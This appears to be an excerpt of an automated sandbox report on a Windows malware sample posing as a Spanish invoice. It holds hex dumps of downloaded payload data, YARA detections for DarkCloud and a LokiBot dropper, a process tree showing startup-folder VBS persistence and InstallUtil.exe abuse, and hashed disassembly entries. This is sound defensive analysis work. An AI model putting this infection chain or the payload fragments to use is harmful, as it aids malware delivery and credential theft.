                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 30 36 33 39 30 46 30 30 30 30 30 30 32 36 32 30 30 30 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 33 31 30 30 34 35 30 31 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 30 30 30 30 30 30 30 30 44 44 38 46 44 46 46 46 46 46 32 30 36 36 30 32 30 30 30 30 32 38 35 36 30 33 30 30 30 36 33 39 31 37 41 42 46 46 46 46 32 36 32 30 32 43 30 30 30 30 30 30 33 38 30 43 41 42 46 46 46 46 32 38 30 42 30 33 30 30 30 36 31 41 34 30 39 34 30 42 30 30 30 30 32 30 32 44 30 31 30 30 30 30 33 38 46 37 41 41 46 46 46 46 33 38 36 41 30 35 30 30 30 30 32 30 33 32 30 30 30 30 30 30 32 38 35 35 30 33 30 30 30 36 33 41 45 33 41 41 46 46 46 46 32 36 32 30 32 33 30 30 30 30 30 30 33 38 44 38 41 41 46 46 46 46 46 45 30 43 34 34 30 30 32 30 30 43 30 30 30 30 30 30 46
                                                                                        Data Ascii: 06390F0000002620000000003804000000FE0C31004501000000050000003800000000DD8FDFFFFF206602000028560300063917ABFFFF26202C000000380CABFFFF280B0300061A40940B0000202D01000038F7AAFFFF386A050000203200000028550300063AE3AAFFFF26202300000038D8AAFFFFFE0C4400200C000000F
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 30 30 30 30 30 41 32 41 32 45 30 30 46 45 30 39 30 30 30 30 32 38 46 38 30 30 30 30 30 41 32 41 32 41 46 45 30 39 30 30 30 30 36 46 46 39 30 30 30 30 30 41 32 41 30 30 32 41 46 45 30 39 30 30 30 30 36 46 43 44 30 30 30 30 30 41 32 41 30 30 33 45 30 30 46 45 30 39 30 30 30 30 46 45 30 39 30 31 30 30 32 38 46 41 30 30 30 30 30 41 32 41 32 41 46 45 30 39 30 30 30 30 36 46 46 42 30 30 30 30 30 41 32 41 30 30 33 45 30 30 46 45 30 39 30 30 30 30 46 45 30 39 30 31 30 30 32 38 38 30 30 30 30 30 30 41 32 41 32 41 46 45 30 39 30 30 30 30 36 46 38 32 30 30 30 30 30 41 32 41 30 30 32 41 46 45 30 39 30 30 30 30 36 46 46 43 30 30 30 30 30 41 32 41 30 30 32 41 46 45 30 39 30 30 30 30 36 46 46 44 30 30 30 30 30 41 32 41 30 30 32 41 46 45 30 39 30 30 30 30 32 38 42 35 30
                                                                                        Data Ascii: 00000A2A2E00FE09000028F800000A2A2AFE0900006FF900000A2A002AFE0900006FCD00000A2A003E00FE090000FE09010028FA00000A2A2AFE0900006FFB00000A2A003E00FE090000FE090100288000000A2A2AFE0900006F8200000A2A002AFE0900006FFC00000A2A002AFE0900006FFD00000A2A002AFE09000028B50
                                                                                        2024-11-18 07:30:37 UTC16384INData Raw: 30 30 30 30 30 30 35 39 39 43 32 30 35 41 30 30 30 30 30 30 33 38 39 36 45 34 46 46 46 46 31 31 30 33 31 33 30 34 32 30 31 38 30 30 30 30 30 30 33 38 38 38 45 34 46 46 46 46 31 36 38 44 31 43 30 30 30 30 30 31 31 33 32 37 32 30 36 41 30 30 30 30 30 30 32 38 42 45 30 33 30 30 30 36 33 39 37 31 45 34 46 46 46 46 32 36 32 30 38 41 30 30 30 30 30 30 33 38 36 36 45 34 46 46 46 46 46 45 30 43 31 32 30 30 32 30 31 38 30 30 30 30 30 30 32 30 38 45 30 30 30 30 30 30 32 30 34 37 30 30 30 30 30 30 35 38 39 43 32 30 46 37 30 30 30 30 30 30 33 38 34 37 45 34 46 46 46 46 46 45 30 43 30 37 30 30 32 30 30 32 30 30 30 30 30 30 32 30 33 35 30 30 30 30 30 30 32 30 33 32 30 30 30 30 30 30 35 39 39 43 32 30 35 31 30 30 30 30 30 30 32 38 42 46 30 33 30 30 30 36 33 41 32 33 45
                                                                                        Data Ascii: 000000599C205A0000003896E4FFFF1103130420180000003888E4FFFF168D1C0000011327206A00000028BE0300063971E4FFFF26208A0000003866E4FFFFFE0C12002018000000208E0000002047000000589C20F70000003847E4FFFFFE0C0700200200000020350000002032000000599C205100000028BF0300063A23E


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:02:30:08
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Users\user\Desktop\Factura modificada____678979879.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\Factura modificada____678979879.exe"
                                                                                        Imagebase:0x570000
                                                                                        File size:3'441'152 bytes
                                                                                        MD5 hash:99B76D55171F966B58012DAF261412F1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1404671311.0000000006DC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.1393807620.00000000047A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:02:30:17
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0x720000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:04:09:47
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Windows\System32\wscript.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs"
                                                                                        Imagebase:0x7ff6365a0000
                                                                                        File size:170'496 bytes
                                                                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:04:09:48
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\WrappedObject.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\WrappedObject.exe"
                                                                                        Imagebase:0x2d0000
                                                                                        File size:3'441'152 bytes
                                                                                        MD5 hash:99B76D55171F966B58012DAF261412F1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DarkCloud, Description: Yara detected DarkCloud, Source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1740206396.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 58%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:04:10:02
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe"
                                                                                        Imagebase:0x90000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:04:10:02
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:04:10:09
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                        Imagebase:0xc20000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:04:10:10
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe"
                                                                                        Imagebase:0xc0000
                                                                                        File size:42'064 bytes
                                                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:13
                                                                                        Start time:04:10:10
                                                                                        Start date:18/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff75da10000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 01261A50 Relevance: .2, Instructions: 249COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e87e45849c88229eea5e35f471368a0933bf9cf2506d5ea453b42b2cf304bd75
                                                                                          • Instruction ID: 931da7f77d11b6a67bc8a88073b14cc4542c2eb075da920e8f34461c7551caba
                                                                                          • Opcode Fuzzy Hash: e87e45849c88229eea5e35f471368a0933bf9cf2506d5ea453b42b2cf304bd75
                                                                                          • Instruction Fuzzy Hash: 6FB17930A20245CFEB15CF69D484BADB7B6FB85305F1482A4E1059B3E9E7B4BC95CB80
                                                                                          Function 012620CA Relevance: .2, Instructions: 183COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a266408d289d5cc7ea5d555e7e3d81e36b3c43d572ce65bf249d4a346a57cc8d
                                                                                          • Instruction ID: ebf51d025b61188c11ab7ae12c5890b82c1bfc2814f7080375154c7ccc4eb5a2
                                                                                          • Opcode Fuzzy Hash: a266408d289d5cc7ea5d555e7e3d81e36b3c43d572ce65bf249d4a346a57cc8d
                                                                                          • Instruction Fuzzy Hash: DE717A74A18204CFEB16CF69C544BE9B7BAEB89300F1481E0D505AB3E6CB74AD86CB50
                                                                                          Function 012620D8 Relevance: .2, Instructions: 178COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1dd800e5485f7dfbfe9f38bf72734b0a7157cd84191d660bde09270d8681d146
                                                                                          • Instruction ID: 81673e8fff1f5215062b4f6bc8e003939b907c14adbb444a44b6df6ff2dcfae9
                                                                                          • Opcode Fuzzy Hash: 1dd800e5485f7dfbfe9f38bf72734b0a7157cd84191d660bde09270d8681d146
                                                                                          • Instruction Fuzzy Hash: A1716A74A18204CFEB15CF69C544BE9B7FAEB89300F1481E1D515AB3DACB74AD86CB50
                                                                                          Function 01261FCA Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C
                                                                                          • API String ID: 0-4201760017
                                                                                          • Opcode ID: 3fb235a1d74381f43883558d26792e9aa7884be4cf6b300fca66f1dc4d5048bf
                                                                                          • Instruction ID: c745e9f26a06dee05472d28832f8cb5187726534cb7f50744271c8e42067e79b
                                                                                          • Opcode Fuzzy Hash: 3fb235a1d74381f43883558d26792e9aa7884be4cf6b300fca66f1dc4d5048bf
                                                                                          • Instruction Fuzzy Hash: 8C017C32D00A4B9BCF10DBA5D8404EEBB72EFCA320F295715D60577190EB70259A8BA0
                                                                                          Function 01261FD0 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: C
                                                                                          • API String ID: 0-4201760017
                                                                                          • Opcode ID: 7ae1a30ea4ef795c349bc98a20581e9e57ee8675c25fee2f11dd9ea7b7d389a4
                                                                                          • Instruction ID: b6b3cb8bbc00e9c1a2876f5297e93fcd5aacbe84a45d9cad3c6ce12c84c6f2f3
                                                                                          • Opcode Fuzzy Hash: 7ae1a30ea4ef795c349bc98a20581e9e57ee8675c25fee2f11dd9ea7b7d389a4
                                                                                          • Instruction Fuzzy Hash: BB01D132D00B0B97CB10DBA5D8004EEBB76EFC9330F655711D60537190EB70329A8BA0
                                                                                          Function 01261BD4 Relevance: .2, Instructions: 230COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 102d1f8e15581db0da215478d944615a6c1eb2b3c075e0a61e1f86a436c0d155
                                                                                          • Instruction ID: 4847b49677bdd173579cdc9fe121b17288b76058d044ee8cd7fcd03536e82566
                                                                                          • Opcode Fuzzy Hash: 102d1f8e15581db0da215478d944615a6c1eb2b3c075e0a61e1f86a436c0d155
                                                                                          • Instruction Fuzzy Hash: 3CA16830A24245CFEB15CF59D484BADB7B6FB85306F1482A4E1059B3E9E7B4BC95CB80
                                                                                          Function 012626B7 Relevance: .1, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f212c24fa2c50d65b22e0cb0bb2be91bdea9991e365ee9a7665928bb23ad159f
                                                                                          • Instruction ID: 08902b90452bebd0ba8af47fb164edba26aed11b3795e652471ca3f4b065ca56
                                                                                          • Opcode Fuzzy Hash: f212c24fa2c50d65b22e0cb0bb2be91bdea9991e365ee9a7665928bb23ad159f
                                                                                          • Instruction Fuzzy Hash: CB513A30B20205CFE726DB69C444B9DB7BAAB84310F54D2A5D0156F2E5C7B5AC86CB60
                                                                                          Function 0126298F Relevance: .1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b6401901568be68de868a488476ca6da6cd0d1a595172abdd1c40313f682ccb3
                                                                                          • Instruction ID: 6977c517fb5196abb4e97a0c530677674703c30223b783e21b189c18f84ee1a9
                                                                                          • Opcode Fuzzy Hash: b6401901568be68de868a488476ca6da6cd0d1a595172abdd1c40313f682ccb3
                                                                                          • Instruction Fuzzy Hash: F8412734B11204CFEB15DB68C445BADBBB7AB88310F64D5A4E015AF3A5CB75EC82CB60
                                                                                          Function 012626F8 Relevance: .1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 19c08d304cb047da299fbd164266907867140a78f72c2771439e0ed75d0a9849
                                                                                          • Instruction ID: 5b19d5d9581cedad3f606bd410f73ee945e28c163fea72763513bb7ed5ce06ab
                                                                                          • Opcode Fuzzy Hash: 19c08d304cb047da299fbd164266907867140a78f72c2771439e0ed75d0a9849
                                                                                          • Instruction Fuzzy Hash: 16413834B11204CFEB15DB68C444BADBBB6BB88310F24D5A8E1156F3A5CB75EC82CB60
                                                                                          Function 0126295D Relevance: .1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c318cd53596f9dfd66485a918008ddea9ae43335d1f88499b3926c78bba3c9a4
                                                                                          • Instruction ID: 26745bf1a73dbd2d055032dd354c16052d501edf31adea7700b752662243c1a1
                                                                                          • Opcode Fuzzy Hash: c318cd53596f9dfd66485a918008ddea9ae43335d1f88499b3926c78bba3c9a4
                                                                                          • Instruction Fuzzy Hash: 5F416A30B10204CFE716EB68C044BADB7BABB84314F5492A8D015AF3E5CB769C86CB60
                                                                                          Function 0126284E Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7584b958f15a5ad8528af5a7747f9efddea3f1f48d8b82e472b0056a03d87ebb
                                                                                          • Instruction ID: 18b0be7d0a4e7f9d00ebec4a8ffca2501ff9475cad1a2b41e5a6fa9d761d18bd
                                                                                          • Opcode Fuzzy Hash: 7584b958f15a5ad8528af5a7747f9efddea3f1f48d8b82e472b0056a03d87ebb
                                                                                          • Instruction Fuzzy Hash: B6415930B11204CFE716DB69C444B9DB7BBBB84314F54D2A4D0156F2E5CB769C86CB60
                                                                                          Function 012628EA Relevance: .1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f0c0a3c11982212faae8ba792d3438a089d932144ae760f5530096525c46ea58
                                                                                          • Instruction ID: f377d23b4772804dd3c8b8c8f626d5f0471321d374fbf69b9e341f7b563b439d
                                                                                          • Opcode Fuzzy Hash: f0c0a3c11982212faae8ba792d3438a089d932144ae760f5530096525c46ea58
                                                                                          • Instruction Fuzzy Hash: 01415930B11204CFE715DB69C444B9DB7BBBB84314F5491A4D0156F2E5C7759C86CB60
                                                                                          Function 012626E8 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a32094daf067c90b1aff4e340cb5b7b4a84a2b58fa458ab904544dc711aead45
                                                                                          • Instruction ID: 4d1b898f369612e1712ffc257b425eb5b4e751ce272a759aafc3a13ee0671c7e
                                                                                          • Opcode Fuzzy Hash: a32094daf067c90b1aff4e340cb5b7b4a84a2b58fa458ab904544dc711aead45
                                                                                          • Instruction Fuzzy Hash: D0415730B11204CFD715DF68C444B9DBBBABB88310F54D6A9D015AF2A5C775AC86CB60
                                                                                          Function 012629E4 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 20197c830d127fe36ef78b907c997e503b15338af10a03cf42890f9cba715be3
                                                                                          • Instruction ID: 96f2f10a6f98d0b63049427bf2b1c46a9a6e5b90d4cd6cf1f90890986f9d4d06
                                                                                          • Opcode Fuzzy Hash: 20197c830d127fe36ef78b907c997e503b15338af10a03cf42890f9cba715be3
                                                                                          • Instruction Fuzzy Hash: 90316930B11204CFE716DB68C444B9DBBBABB84314F5491A4E015AF3E5C775AC86CF60
                                                                                          Function 012628A5 Relevance: .1, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0ef8019b437857572b567aef9070d89909c48f48fa360ffb4df31872e1600836
                                                                                          • Instruction ID: 9905f55b147e2d3d696134c57ba7e890f4fad864411254fa717050af4d9da43b
                                                                                          • Opcode Fuzzy Hash: 0ef8019b437857572b567aef9070d89909c48f48fa360ffb4df31872e1600836
                                                                                          • Instruction Fuzzy Hash: 19317930B11204CFE716DB68D444BADBBBBBB84314F54D2A9E0156F2E5CB769C86CB60
                                                                                          Function 012626DE Relevance: .1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2670bb9f81687c962e4cb1b7fae7c07e2b591548743a27b79998ba6f6939d2fc
                                                                                          • Instruction ID: 6a81eb18b73b224dfa3fd80d222027138c90458364010403a2f4f04528bc8abd
                                                                                          • Opcode Fuzzy Hash: 2670bb9f81687c962e4cb1b7fae7c07e2b591548743a27b79998ba6f6939d2fc
                                                                                          • Instruction Fuzzy Hash: C3316A30B11205CFE715DB68C444BADBBBABF84310F5496A8D0156F2E5CB76AC86CB60
                                                                                          Function 012626C2 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1386311336.0000000001260000.00000040.00000800.00020000.00000000.sdmp, Offset: 01260000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_1260000_Factura modificada____678979879.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b85f1c83f2db62c0907b0df981a0f75b941d15b136bb7c77345761281002153
                                                                                          • Instruction ID: 2f3b9d8c85bfe266302ed3beed9597e97b2b2935c313433fcb97327da7e4fff6
                                                                                          • Opcode Fuzzy Hash: 2b85f1c83f2db62c0907b0df981a0f75b941d15b136bb7c77345761281002153
                                                                                          • Instruction Fuzzy Hash: 79313730B11205CFE715DB68C444B9DB7BAAB84314F6496A8D0156F2E5CB76AC86CB60
                                                                                          Function 01263966 Relevance: .1, Instructions: 86COMMON
